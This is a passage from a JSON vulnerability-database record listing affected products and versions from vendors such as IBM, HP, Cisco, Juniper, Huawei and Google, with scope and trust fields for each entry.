"eq", "trust": 0.3, "vendor": "juniper", "version": "6.4" }, { "model": "fortimail", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "4.3.7" }, { "model": "one-x communicator for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.2" }, { "model": "expressway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.6" }, { "model": "fortiweb", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.0.4" }, { "model": "storage management initiative specification providers fo", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "57100" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.1" }, { "model": "storevirtual 1tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "msr30-1x russian version", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.15" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1209" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.79" }, { "model": "puremessage for unix", "scope": "eq", "trust": 0.3, "vendor": "sophos", "version": "4.04" }, { "model": "junos 11.4r5.5", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "cognos business intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4.1" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.74" }, { "model": "laserjet enterprise p3015 ce595a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "laserjet p4515 cb514a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "4.213.1" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.1.2" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "websphere datapower xml security gateway xs40", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.03" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.2" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.0" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "sterling connect:direct", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "netscaler build", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "9.070.5" }, { "model": "content analysis system software", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "1.1.1.1" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "4.1.11" }, { "model": "security information and event management ga", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "9.4.0" }, { "model": "junos 11.4r12-s1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "data ontap", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "7.2.4" }, { "model": "family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "125000" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.2" }, { "model": "8.4-beta1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.55" }, { "model": "officejet enterprise color c2s11a 2302963 436074", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "x555" }, { "model": "web appliance", "scope": "eq", "trust": 0.3, "vendor": "symantec", "version": "3.9.0.0" }, { "model": "tsm v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "project openssl f", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.12" }, { "model": "msr30-16 family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "imc ead", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.00" }, { "model": "rational tau", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.31" }, { "model": "laserjet m5035 multifunction printer q7829a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "fortios b064", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "2.1.5-1" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.12" }, { "model": "mysql", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "5.6.20" }, { "model": "laserjet p4015 cb509a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "4.213.1" }, { "model": "usg9500 v300r001c20sph102", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x353071600" }, { "model": "initiate master data service patient hub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "laserjet m3035 multifunction printer cb414a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "48.306.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.25" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "11.4x27.43" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.13" }, { "model": "asa cx context-aware security", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "color laserjet cp5525 ce709a 2302963 436070", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "horizon workspace client for windows", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "1.5" }, { "model": "web filter", "scope": "eq", "trust": 0.3, "vendor": "websense", "version": "7.7" }, { "model": "project openssl 1.0.1d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "integrated management module ii", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.52" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "unified im and presence services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "junos 11.4r7-s1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "junos d10", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1x47" }, { "model": "security network intrusion prevention system gv200", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "laserjet enterprise color mfp m880 a2w75a 2302963 436068", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "800" }, { "model": "elog v100r003c01spc503", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.3" }, { "model": "system storage ts3400 tape library", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0040" }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3100" }, { "model": "cit", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.40" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x357087520" }, { "model": "flex system fabric en4093r 10gb scalable switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.4.0" }, { "model": "s5900 v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "scanjet enterprise document capture workstation l2719a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "85000" }, { "model": "fortiweb", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.2.0" }, { "model": "s6900 v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "web security gateway anywhere", "scope": "eq", "trust": 0.3, "vendor": "websense", "version": "7.7.3" }, { "model": "storevirtual hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.5" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "7.1" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1" }, { "model": "storevirtual 3tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "storevirtual fc 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "junos 12.1r11", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "fusionsphere v100r003", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "5.0.5" }, { "model": "websphere datapower soa appliance", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.015" }, { "model": "tsm v100r002c07spc219", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "vma san gateway g5.5.1.3", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "network connect", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "6.4.0.14619" }, { "model": "one-x mobile lite for android", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.173" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3" }, { "model": "system dx360m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "63911.42" }, { "model": "espace iad v300r002c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "sterling connect:direct", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.6" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.4" }, { "model": "documentum content server sp1 p28", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.24" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "prime collaboration provisioning", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.8" }, { "model": "security network intrusion prevention system gx7412-10", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "fortianalyzer", "scope": "ne", "trust": 0.3, "vendor": "fortinet", "version": "5.0.7" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.45" }, { "model": "arubaos", "scope": "ne", "trust": 0.3, "vendor": "arubanetworks", "version": "6.4.1.0" }, { "model": "cognos express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "-release-p5", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.0" }, { "model": "color laserjet cp6015 q3931a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "53.236.1" }, { "model": "9.2-rc3-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.5" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.1" }, { "model": "laserjet p3005 printer series q7815a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "2.190.3" }, { "model": "datafort fc-series", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1.0.9" }, { "model": "vcac", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "6.0.1" }, { "model": "vcenter site recovery manager", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5.1" }, { "model": "power express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7200" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "laserjet printer series q5408a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "43508.250.2" }, { "model": "s2750\u0026s5700\u0026s6700 v200r003", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "xiv storage system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "281011.3" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.0" }, { "model": "4210g switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53003.0" }, { "model": "aura application server sip core pb25", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.1.4" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.2" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.8" }, { "model": "junos r1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": "14.1" }, { "model": "laserjet enterprise m603 series ce995a 2302963 436082", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "600" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.118" }, { "model": "unified series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "79000" }, { "model": "integrated management module ii", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.88" }, { "model": "vdi-in-a-box", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "5.4.3" }, { "model": "integrated management module ii", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.95" }, { "model": "tivoli netcool/system service monitor fp3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "aura experience portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "hyperdp v200r001c09spc501", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "ei switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "55000" }, { "model": "nsx for multi-hypervisor", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "4.0.3" }, { "model": "toolscenter suite", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.52" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x355079140" }, { "model": "integrated lights out manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.2.3" }, { "model": "utm", "scope": "ne", "trust": 0.3, "vendor": "sophos", "version": "9.203" }, { "model": "data ontap", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "7.3.1.1" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "telepresence", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "13100" }, { "model": "project openssl 1.0.1b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0k", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "laserjet enterprise mfp m725 cf069a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "aura system platform sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "sylpheed", "scope": "eq", "trust": 0.3, "vendor": "sylpheed", "version": "0.9.10" }, { "model": "laserjet printer series q7784a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "42408.250.2" }, { "model": "switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "59000" }, { "model": "project metasploit framework", "scope": "ne", "trust": 0.3, "vendor": "metasploit", "version": "4.9.3" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.0" }, { "model": "usg2000 v300r001c10spc200", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.86" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "3.1.12" }, { "model": "vdi-in-a-box", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "5.3.3" }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "project metasploit framework", "scope": "eq", "trust": 0.3, "vendor": "metasploit", "version": "4.9.2" }, { "model": "cloudsystem enterprise software", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "8.1" }, { "model": "storevirtual 600gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413012.5" }, { "model": "switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "75000" }, { "model": "one-x communicator for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura system platform sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "watson explorer security", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "6" }, { "model": "junos r12", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "11.4" }, { "model": "websphere datapower low latency appliance xm70", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.0" }, { "model": "fortiweb", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.1.4" }, { "model": "9.0-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.6.7" }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.0" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "laserjet enterprise mfp m725 cf068a 2302963 436078", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "integrated management module ii", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.59" }, { "model": "laserjet enterprise mfp m725 cf068a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10500" }, { "model": "flare experience for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.1.3" }, { "model": "laserjet enterprise color mfp m575dn cd644a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5000" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "junos os 14.1r1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "8.4-release-p7", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "operations analytics", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1" }, { "model": "color laserjet cp3505 printer series cb442a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "3.160.2" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.0.2" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1" }, { "model": "rational tau", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.32" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.2" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.42" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "aura utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "e-business suite 11i", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.5.10.2" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.6" }, { "model": "laserjet printer series q5400a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "42508.250.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.0.1" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x357087220" }, { "model": "blackberry enterprise service", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.2.0" }, { "model": "netscaler", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "9.3" }, { "model": "laserjet printer series q7546a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "52008.241" }, { "model": "command view for tape libraries", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "3.8" }, { "model": "big-iq security", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.1" }, { "model": "unified contact center express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "laserjet printer series q7547a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "52008.241" }, { "model": "svn5500 v200r001c01hp0001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "project openssl beta2", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "websphere datapower xml security gateway xs40", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.01" }, { "model": "rox", "scope": "ne", "trust": 0.3, "vendor": "siemens", "version": "22.6" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "power ps701", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "color laserjet m651 cz256a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "websphere datapower xml security gateway xs40", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.012" }, { "model": "agent desktop for cisco unified contact center enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "5.0.8" }, { "model": "vdi communicator", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0.3" }, { "model": "oceanstor s5500t v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "laserjet enterprise mfp m725 cf066a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "proxysgos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.1" }, { "model": "laserjet enterprise mfp m630 series b3g85a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "one-x communicator for mac os", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "x1.0.1" }, { "model": "aura messaging sp4", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "telepresence profile series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "5.0.3" }, { "model": "espace iad v300r001c07", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "software foundation python", "scope": "eq", "trust": 0.3, "vendor": "python", "version": "3.4" }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "laserjet enterprise color m775 series cf304a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7000" }, { "model": "9.2-rc1-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413012.5" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.119" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "11.2" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "laserjet printer series q5402a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "42508.250.2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.7" }, { "model": "msr30-1x family", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "vcloud networking and security", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5.2" }, { "model": "color laserjet printer series q7491a", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "470046.230.6" }, { "model": "4510g switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "4.0.6" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.5" }, { "model": "laserjet m3035 multifunction printer cb414a", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "dsr-1000 rev. a1", "scope": null, "trust": 0.3, "vendor": "d link", "version": null }, { "model": "operations automation", "scope": "eq", "trust": 0.3, "vendor": "parallels", "version": "5.0" }, { "model": "websphere datapower soa appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.4" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.1" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "4.0.5" }, { "model": "linerate", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "1.6.2" }, { "model": "one-x communicator for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.9" }, { "model": "winscp", "scope": "eq", "trust": 0.3, "vendor": "winscp", "version": "5.1.1" }, { "model": "one-x mobile lite for iphone", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "0" }, { "model": "documentum content server sp2 p16", "scope": "ne", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "sparc enterprise m5000 xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1117" }, { "model": "project openssl 1.0.0a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "junos 12.1x44-d15", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.4" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "4.3.2" }, { "model": "database and middleware automation", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10.20" }, { "model": "laserjet enterprise color mfp m575dn cd644a 2302963 436081", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "500" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "network connect", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "6.0.0.12875" }, { "model": "power system s822", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "network connect 8.0r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": 